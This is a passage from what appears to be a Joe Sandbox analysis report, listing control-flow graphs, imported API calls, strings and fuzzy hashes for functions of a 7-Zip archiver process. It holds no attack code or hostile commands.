                                                                control_flow_graph 3392 1338e8-133977 call 131700 call 13373c memmove 3397 133992-1339a5 3392->3397 3398 133979-13398d call 133864 free 3392->3398 3400 133a30-133a3d call 133864 3397->3400 3401 1339ab 3397->3401 3405 133cb6-133cc9 3398->3405 3409 133a65-133a77 3400->3409 3410 133a3f-133a64 call 1302a0 _CxxThrowException 3400->3410 3404 1339ae-1339c2 3401->3404 3407 1339c4-1339ec call 1309e0 call 112130 3404->3407 3408 133a1d-133a25 3404->3408 3424 1339fb 3407->3424 3425 1339ee-1339f9 call 113314 3407->3425 3408->3404 3412 133a27-133a2b 3408->3412 3415 133ae1-133b27 call 145f5c call 1313e8 * 2 3409->3415 3416 133a79-133a7c 3409->3416 3410->3409 3412->3400 3439 133c2a-133c46 free 3415->3439 3440 133b2d-133b30 3415->3440 3420 133a7e-133aac call 113208 call 116e10 call 112130 3416->3420 3445 133aae-133abb call 113314 3420->3445 3446 133abd 3420->3446 3430 1339fe-133a16 call 11b8f0 free 3424->3430 3425->3430 3430->3408 3442 133c76-133c84 free 3439->3442 3443 133c48 3439->3443 3444 133b33-133b56 call 112130 3440->3444 3449 133c88-133c95 3442->3449 3448 133c4c-133c5f 3443->3448 3461 133b68 3444->3461 3462 133b58-133b66 call 113314 3444->3462 3447 133ac0-133adf call 11b8f0 free 3445->3447 3446->3447 3447->3415 3447->3420 3453 133c71-133c74 3448->3453 3454 133c61-133c6c free * 2 3448->3454 3455 133ca7-133caa 3449->3455 3456 133c97-133ca2 free * 2 3449->3456 3453->3442 3453->3448 3454->3453 3455->3449 3460 133cac-133cb4 free 3455->3460 3456->3455 3460->3405 3463 133b6b-133ba1 call 112130 3461->3463 3462->3463 3468 133bb3 3463->3468 3469 133ba3-133bb1 call 113314 3463->3469 3471 133bb6-133bc6 3468->3471 3469->3471 3473 133be4-133bf2 3471->3473 3474 133bc8-133be2 call 114338 3471->3474 3473->3444 3476 133bf8 3473->3476 3474->3473 3478 133bfa-133c29 call 1302a0 _CxxThrowException 3474->3478 3476->3439 3478->3439
                                                                APIs
                                                                  • Part of subcall function 0013373C: free.MSVCRT ref: 001337FB
                                                                • memmove.MSVCRT ref: 0013396F
                                                                • free.MSVCRT ref: 00133986
                                                                • free.MSVCRT ref: 00133A11
                                                                • _CxxThrowException.MSVCRT ref: 00133A5F
                                                                • free.MSVCRT ref: 00133AD3
                                                                  • Part of subcall function 00133864: free.MSVCRT ref: 00133877
                                                                  • Part of subcall function 00133864: free.MSVCRT ref: 00133892
                                                                  • Part of subcall function 00133864: free.MSVCRT ref: 0013389B
                                                                  • Part of subcall function 00133864: free.MSVCRT ref: 001338C6
                                                                  • Part of subcall function 00133864: free.MSVCRT ref: 001338CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowmemmove
                                                                • String ID: Cannot find archive$Duplicate archive path:
                                                                • API String ID: 3934437811-2067063536
                                                                • Opcode ID: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
                                                                • Instruction ID: 0bc3e126a23b2a008f8e61f20a7571a322366f3869d32a21d89c3badd2b0b122
                                                                • Opcode Fuzzy Hash: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
                                                                • Instruction Fuzzy Hash: A2A1A572315B8492CA24EB15E89069EB3A1F7D5BD0F445522EF9E47B28DF38C986CB04

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3481 1442a2-1442c0 3483 1442d5-1442d8 3481->3483 3484 1442c2-1442d0 3481->3484 3485 1442e0-1443ab call 1340c4 memmove call 113404 call 143a20 3483->3485 3486 1442da 3483->3486 3484->3483 3494 1443b1-1443b3 3485->3494 3495 1445d8-14468f call 113404 * 3 free * 2 call 13419c 3485->3495 3486->3485 3496 1446c5-1446f4 free * 2 call 13419c 3494->3496 3497 1443b9-1443d7 call 13c684 3494->3497 3534 144691-144697 3495->3534 3535 144698-1446a0 3495->3535 3506 1446f6-1446fc 3496->3506 3507 1446fd-144705 3496->3507 3508 1443dd-1443ef call 112130 3497->3508 3509 144728-144757 free * 2 call 13419c 3497->3509 3506->3507 3513 144707-14470d 3507->3513 3514 14470e-144719 3507->3514 3524 1443f1-144401 call 13caac 3508->3524 3525 144403 3508->3525 3521 144760-144768 3509->3521 3522 144759-14475f 3509->3522 3513->3514 3519 144721-144723 3514->3519 3520 14471b 3514->3520 3527 1447fe-144811 3519->3527 3520->3519 3529 144771-14477c 3521->3529 3530 14476a-144770 3521->3530 3522->3521 3532 144406-144441 call 11b8f0 free * 2 call 13419c 3524->3532 3525->3532 3536 144784-144786 3529->3536 3537 14477e 3529->3537 3530->3529 3551 144443-144449 3532->3551 3552 14444a-144452 3532->3552 3534->3535 3541 1446a2-1446a8 3535->3541 3542 1446a9-1446b4 3535->3542 3536->3527 3543 1447f2-1447fb 3536->3543 3537->3536 3541->3542 3542->3543 3547 1446ba-1446c0 3542->3547 3543->3527 3547->3543 3551->3552 3553 144454-14445a 3552->3553 3554 14445b-14446c 3552->3554 3553->3554 3556 144472-144478 3554->3556 3557 143fa9-144033 memmove 3554->3557 3556->3557 3560 144054-144072 memmove 3557->3560 3561 144035-144052 memmove 3557->3561 3560->3543 3563 144078-1440e9 memmove call 13c0fc call 113404 * 2 call 143d58 3560->3563 3561->3563 3573 1440ee-1440f2 3563->3573 3574 14447d-144480 3573->3574 3575 1440f8-14410a call 112130 3573->3575 3576 144486-14450b call 113404 * 3 3574->3576 3577 14450c-14451b call 13419c 3574->3577 3583 14410c-14411c call 13caac 3575->3583 3584 14411e 3575->3584 3576->3577 3577->3527 3588 144121-14413a call 11b8f0 call 13419c 3583->3588 3584->3588
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-3916222277
                                                                • Opcode ID: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
                                                                • Instruction ID: d040aca79f2cfd53f64ca0dd6f26ee9278c71eb076d11cf3767e6f73c35c71d4
                                                                • Opcode Fuzzy Hash: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
                                                                • Instruction Fuzzy Hash: 40D13E37209BC496CB25DF65E0902AEBB60F7D6B44F445026EB8E47B29DF78C599CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$memmove
                                                                • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                • API String ID: 2879976980-73314117
                                                                • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                • Instruction ID: bfb679ee44490635c7c9ef6076614f070b1805b77f4c87bdddfd2ccebb1e762b
                                                                • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                • Instruction Fuzzy Hash: A54148B6215A41C6DB30DF25F88079EB3A1F794784F400526EB8E877A4DFB8C949CB00
                                                                APIs
                                                                • fputs.MSVCRT ref: 00151CF9
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                  • Part of subcall function 00112300: fputc.MSVCRT ref: 00112311
                                                                • fputs.MSVCRT ref: 00151DEE
                                                                • fputs.MSVCRT ref: 00151F07
                                                                • fputs.MSVCRT ref: 00151F5C
                                                                  • Part of subcall function 0015171C: fputs.MSVCRT ref: 00151744
                                                                  • Part of subcall function 0015171C: fputs.MSVCRT ref: 00151758
                                                                  • Part of subcall function 0015171C: free.MSVCRT ref: 0015176B
                                                                  • Part of subcall function 00116618: FormatMessageW.KERNEL32 ref: 00116676
                                                                  • Part of subcall function 00116618: LocalFree.KERNEL32 ref: 00116698
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 0011237E
                                                                  • Part of subcall function 00112320: fputs.MSVCRT ref: 001123B8
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 001123C4
                                                                • free.MSVCRT ref: 00151F86
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                • API String ID: 2553544393-24972044
                                                                • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                • Instruction ID: 1fad1f2946326f43e26e1a8a2d4e4649be1bd388cf86d80a902f63b769c7342f
                                                                • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                • Instruction Fuzzy Hash: D5A13B66304A84EACA2AEF61D5913EDB321F755B81F484126DF6E0B611DFB8D8A8C300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrowfputs
                                                                • String ID: Decoding ERROR
                                                                • API String ID: 117389134-2585761706
                                                                • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                • Instruction ID: 9b65c4bf3ba16e595d6092630633b374ea93aeeb0e2f2a8c1d3ec1ebc3b51548
                                                                • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                • Instruction Fuzzy Hash: 393106623659C0D1CA30EF25E8803EDA360FB92781F884622CE6E4B758DF78C989C701
                                                                APIs
                                                                  • Part of subcall function 00116464: FreeLibrary.KERNELBASE(?,?,?,001164E7), ref: 00116475
                                                                  • Part of subcall function 00113404: free.MSVCRT ref: 00113431
                                                                  • Part of subcall function 00113404: memmove.MSVCRT ref: 0011344C
                                                                • GetProcAddress.KERNEL32 ref: 0013A8CA
                                                                • GetProcAddress.KERNEL32 ref: 0013A8E8
                                                                • GetProcAddress.KERNEL32 ref: 0013A908
                                                                • free.MSVCRT ref: 0013A985
                                                                • free.MSVCRT ref: 0013A996
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AddressProcfree$FreeLibrarymemmove
                                                                • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                • API String ID: 852969883-606380122
                                                                • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                • Instruction ID: 55ef3e482220098907c29e21487eddfc4985326d881a58b2169a43c828aeff94
                                                                • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                • Instruction Fuzzy Hash: E241A036201B4086DF25EF26E85079E7360FB95B98F888524DFDA47B65EF38C886C341
                                                                APIs
                                                                • strcmp.MSVCRT ref: 0015B723
                                                                • fputs.MSVCRT ref: 0015B743
                                                                  • Part of subcall function 001138C8: memmove.MSVCRT(0011A0E5), ref: 00113907
                                                                  • Part of subcall function 00113A64: memmove.MSVCRT ref: 00113AAA
                                                                • GetTickCount.KERNEL32 ref: 0015B49E
                                                                  • Part of subcall function 00113404: free.MSVCRT ref: 00113431
                                                                  • Part of subcall function 00113404: memmove.MSVCRT ref: 0011344C
                                                                • strcmp.MSVCRT ref: 0015B4E3
                                                                • wcscmp.MSVCRT ref: 0015B502
                                                                • strcmp.MSVCRT ref: 0015B568
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                • String ID: .
                                                                • API String ID: 591578422-4150638102
                                                                • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                • Instruction ID: 6c5b0d232f6a8cfcd27a68b1e3964036fd50a4b1153c061daea3a9839908a66f
                                                                • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                • Instruction Fuzzy Hash: E2A14B77704A85EBCB19DF2AD69029D7361F354785F808026DB6A4BB11EF34E8BAC740
                                                                APIs
                                                                  • Part of subcall function 00139BCC: free.MSVCRT ref: 00139C11
                                                                  • Part of subcall function 00139BCC: free.MSVCRT ref: 00139C19
                                                                  • Part of subcall function 00139BCC: free.MSVCRT ref: 00139C3B
                                                                  • Part of subcall function 00139BCC: free.MSVCRT ref: 00139D2A
                                                                • wcscmp.MSVCRT ref: 00139E66
                                                                • free.MSVCRT ref: 00139ECA
                                                                • free.MSVCRT ref: 00139ED4
                                                                • free.MSVCRT ref: 00139F13
                                                                • free.MSVCRT ref: 00139F1B
                                                                • free.MSVCRT ref: 00139F28
                                                                • free.MSVCRT ref: 00139F49
                                                                • free.MSVCRT ref: 00139F51
                                                                  • Part of subcall function 00113404: free.MSVCRT ref: 00113431
                                                                  • Part of subcall function 00113404: memmove.MSVCRT ref: 0011344C
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmovewcscmp
                                                                • String ID:
                                                                • API String ID: 3584677832-0
                                                                • Opcode ID: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
                                                                • Instruction ID: df2879cc4c6eb6d290e1ea8add320f56c41de0886b3f75283d2a7acc04f4341a
                                                                • Opcode Fuzzy Hash: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
                                                                • Instruction Fuzzy Hash: 0041F726304A4091CB14FF16E8801AFAB65F795BE8F451235EF6D47768DFB8C89AC700
                                                                APIs
                                                                • fputs.MSVCRT ref: 00152F7E
                                                                • fputs.MSVCRT ref: 00152F9D
                                                                • free.MSVCRT ref: 00152FB6
                                                                • free.MSVCRT ref: 00152FC1
                                                                  • Part of subcall function 00112C78: free.MSVCRT ref: 00112CAE
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 0011237E
                                                                  • Part of subcall function 00112320: fputs.MSVCRT ref: 001123B8
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 001123C4
                                                                • free.MSVCRT ref: 00152FCC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$fputs
                                                                • String ID: =
                                                                • API String ID: 2444650769-2525689732
                                                                • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                • Instruction ID: 893257485d0f8a736df4f5dfd55d2947ca40d4e47addee562b897b7723239b7e
                                                                • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                                                • Instruction Fuzzy Hash: 87218523215940D1CB24EF15E8912AEA731E7E67D1F485232FF6E47669DF38C989C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                • String ID:
                                                                • API String ID: 352749199-0
                                                                • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                • Instruction ID: 2b1b4c022745e59dc404135af57f05b211f39b7b793987a3277f7baef60e2d5f
                                                                • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                • Instruction Fuzzy Hash: 32314F71514B41CAEB44DF24E89039A77B1F3847A6F50023AEA6E4B7A4DF3CC549CB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                • String ID:
                                                                • API String ID: 352749199-0
                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                • Instruction ID: 93ae6f2d2ea99a8a91651a103bd1e33b80af02de2b37075b2d342007bc6f1cb4
                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                • Instruction Fuzzy Hash: 0D211C75614B41C6EB44DF28EC9039A73B1F784766F500229EA6E4B7A4DF3CC54ACB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                • String ID:
                                                                • API String ID: 352749199-0
                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                • Instruction ID: 93ae6f2d2ea99a8a91651a103bd1e33b80af02de2b37075b2d342007bc6f1cb4
                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                • Instruction Fuzzy Hash: 0D211C75614B41C6EB44DF28EC9039A73B1F784766F500229EA6E4B7A4DF3CC54ACB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                • String ID:
                                                                • API String ID: 352749199-0
                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                • Instruction ID: 93ae6f2d2ea99a8a91651a103bd1e33b80af02de2b37075b2d342007bc6f1cb4
                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                • Instruction Fuzzy Hash: 0D211C75614B41C6EB44DF28EC9039A73B1F784766F500229EA6E4B7A4DF3CC54ACB40
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                • Instruction ID: 53ac7680db598eb3b869b29fda5bd555977ac779dc01e5ce02a4543160452349
                                                                • Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
                                                                • Instruction Fuzzy Hash: EA114F63741A44A7CA28FE62D9921A92324EBA3BB0B1C4371DF3D17795DF24D8B28304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                • Instruction ID: 40e44c2562abcc7c38337b22ae2049c09bccc30f4efceea52a8ebfaa1a99fb76
                                                                • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                • Instruction Fuzzy Hash: C211B722311A4096CF18EF75D8A126D7320FBD2F99B184671EF6E4B765CF34C8568344
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                • Instruction ID: 0768c47e355909f5813f9bef297bdbe5e2c4aff5176c50da650f9eeafb793901
